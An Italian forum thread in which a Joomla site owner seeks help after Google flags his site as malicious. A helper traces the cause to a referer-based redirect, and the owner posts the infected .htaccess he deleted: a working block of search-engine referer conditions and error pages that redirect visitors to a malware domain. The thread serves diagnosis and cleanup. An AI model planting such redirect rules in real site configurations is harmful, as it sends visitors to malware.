Aiuto! Sono sotto attacco hacker!

Ciao amici stamattina mi sono accorto che entrare nel mio sito ONLINEFITNESS
http://onlinefitness.altervista.org/
(creato con joomla) da Google è impossibile in quanto mi appare una schermata rossa GOOGLE
(noto che cliccando il link che ho inserito qui il sito funziona, ma se utlizzate google con le key del sito no!, esempio se scrivo allenamento gambe e cliccando sul mio sito ecco li' che esce la schermata malware di google)



che mi impedisce di entrare, posso entrare solo tramite i preferiti! Entrando nel pannello di controllo Joomla sono andato a gestione utenti e ad administrator per cambiare la password, ma mi da' administrator come bloccato e appena ci clicco sopra mi ritorna la schermata di stop di google!

Ecco il testo

Segnalato sito malevolo
Il sito web cdkkru322.co.cc è stato segnalato come sito web malevolo ed è stato bloccato sulla base delle impostazioni di sicurezza correnti.
Un sito web malevolo cerca di installare dei software in grado di sottrarre le informazioni personali degli utenti, sfruttare il computer per attaccare altre macchine o semplicemente danneggiare il sistema.

Alcuni di questi siti distribuiscono intenzionalmente software dannoso, ma gran parte dei siti viene compromessa senza che il proprietario ne sia a conoscenza o ne sia responsabile.


dovrei cambiare l'htaccess? cosa devo fare?
qualcuno puo' aiutarmi?
grazieeee raga'

io accedendo al tuo sito non ricevo alcuna notifica, né con chrome, né con firefox, e ho pure kis2011 installato.

p.s. mettere due o più banner dello stesso formato nella stessa pagina paga sempre come uno solo.

[darkwolf]

Effettivamente, facendo la ricerca, ottengo questo link: onlinefitness.altervista.org/index.php/allenamento-gambe
Il quale cliccandolo risulta infetto. Accedendo manualmente a tale link non riscontro alcun problema però.
Potrebbe trattarsi di un controllo sul referer che fa il redirect a tale dominio.
Controlla l'htaccess (potrebbe essere stato alterato)
-
Edit: http://www.google.it/search?source=i...0b6c4dee0a6ef3
Il redirect è su tutti i link (e quindi confermo un probabile controllo sul referer).

sapresti dirmi come posso pulire l'htaccess? dove posso recuperarlo sano?

[darkwolf]

Se riesci a pubblicarlo qui sul forum provvederemo a dargli un'occhiata

Dark grazie a dio ho risolto!
ho modificato manualmente l'htaccess da pannello di controllo di altervista e ora il sito è accessibile anche con le key di ricerca google!
in pratica ho cancellato le righe infette!
ecco il testo
ho cancellato le righe con cdkkru322.co.cc
spero possa essere di aiuto per gli altri altervistiani ;)

Codice:

RewriteEngine On
ErrorDocument 400 h**p://cdkkru322.co.cc/go.php?sid=1
ErrorDocument 401 h**p://cdkkru322.co.cc/go.php?sid=1
ErrorDocument 403 h**p://cdkkru322.co.cc/go.php?sid=1
ErrorDocument 404 h**p://cdkkru322.co.cc/go.php?sid=1
ErrorDocument 500 h**p://cdkkru322.co.cc/go.php?sid=1
ErrorDocument 502 h**p://cdkkru322.co.cc/go.php?sid=1
RewriteCond %{HTTP_REFERER} .*google.* [OR]
RewriteCond %{HTTP_REFERER} .*ask.* [OR]
RewriteCond %{HTTP_REFERER} .*yahoo.* [OR]
RewriteCond %{HTTP_REFERER} .*baidu.* [OR]
RewriteCond %{HTTP_REFERER} .*youtube.* [OR]
RewriteCond %{HTTP_REFERER} .*wikipedia.* [OR]
RewriteCond %{HTTP_REFERER} .*qq.* [OR]
RewriteCond %{HTTP_REFERER} .*excite.* [OR]	
RewriteCond %{HTTP_REFERER} .*altavista.* [OR]
RewriteCond %{HTTP_REFERER} .*msn.* [OR]
RewriteCond %{HTTP_REFERER} .*netscape.* [OR]
RewriteCond %{HTTP_REFERER} .*aol.* [OR]
RewriteCond %{HTTP_REFERER} .*hotbot.* [OR]
RewriteCond %{HTTP_REFERER} .*goto.* [OR]
RewriteCond %{HTTP_REFERER} .*infoseek.* [OR]
RewriteCond %{HTTP_REFERER} .*mamma.* [OR]
RewriteCond %{HTTP_REFERER} .*alltheweb.* [OR]
RewriteCond %{HTTP_REFERER} .*lycos.* [OR]
RewriteCond %{HTTP_REFERER} .*search.* [OR]
RewriteCond %{HTTP_REFERER} .*metacrawler.* [OR]
RewriteCond %{HTTP_REFERER} .*bing.* [OR]
RewriteCond %{HTTP_REFERER} .*dogpile.* [OR]
RewriteCond %{HTTP_REFERER} .*facebook.* [OR]
RewriteCond %{HTTP_REFERER} .*twitter.* [OR]
RewriteCond %{HTTP_REFERER} .*blog.* [OR]
RewriteCond %{HTTP_REFERER} .*live.* [OR]
RewriteCond %{HTTP_REFERER} .*myspace.* [OR]
RewriteCond %{HTTP_REFERER} .*linkedin.* [OR]
RewriteCond %{HTTP_REFERER} .*flickr.*

RewriteRule ^(.*)$ h**p://cdkkru322.co.cc/go.php?sid=1 [R=301,L]

anche se da pannello di controllo di joomla e cliccando in gestione utenti administrator per cambiare la password mi porta sempre alla schermata di stop malware di google!
diciamo problema risolto a meta'!

[darkwolf]

Possibile ci sia ancora qualcosa nel sorgente (assicurati tu stesso, controllando nei sorgenti della pagina)
Assicurati inoltre di avere l'ultima versione di joomla e di eventuali plugin (potrebbe essere stato sfruttato un qualche bug per infettarti il sito).
Assicurati anche di avere il pc pulito (quello dal quale effettui il login via ftp) da eventuali virus/malware/spyware (i quali potrebbero aver ottenuto i dati di login per eseguire le modifiche).
Fatto ciò cambia i dati di login.